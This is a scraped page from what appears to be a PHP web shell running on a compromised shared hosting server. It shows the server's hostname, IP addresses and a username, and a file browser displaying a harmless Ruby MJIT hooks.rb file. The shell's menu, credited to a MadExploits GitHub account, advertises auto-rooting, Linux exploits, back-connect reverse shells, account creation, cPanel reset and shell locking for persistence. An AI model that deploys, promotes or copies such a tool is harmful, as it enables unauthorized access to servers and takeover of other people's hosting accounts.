Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.144.253.195
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby32 /
share /
ruby /
ruby_vm /
mjit /
[ HOME SHELL ]
Name
Size
Permission
Action
c_pointer.rb
9.02
KB
-rw-r--r--
c_type.rb
2.49
KB
-rw-r--r--
compiler.rb
39.42
KB
-rw-r--r--
hooks.rb
915
B
-rw-r--r--
instruction.rb
66.32
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : hooks.rb
module RubyVM::MJIT::Hooks # :nodoc: all C = RubyVM::MJIT.const_get(:C, false) def self.on_bop_redefined(_redefined_flag, _bop) C.mjit_cancel_all("BOP is redefined") end def self.on_cme_invalidate(_cme) # to be used later end def self.on_ractor_spawn C.mjit_cancel_all("Ractor is spawned") end def self.on_constant_state_changed(_id) # to be used later end def self.on_constant_ic_update(_iseq, _ic, _insn_idx) # to be used later end def self.on_tracing_invalidate_all(new_iseq_events) # Stop calling all JIT-ed code. We can't rewrite existing JIT-ed code to trace_ insns for now. # :class events are triggered only in ISEQ_TYPE_CLASS, but mjit_target_iseq_p ignores such iseqs. # Thus we don't need to cancel JIT-ed code for :class events. if new_iseq_events != C.RUBY_EVENT_CLASS C.mjit_cancel_all("TracePoint is enabled") end end end
Close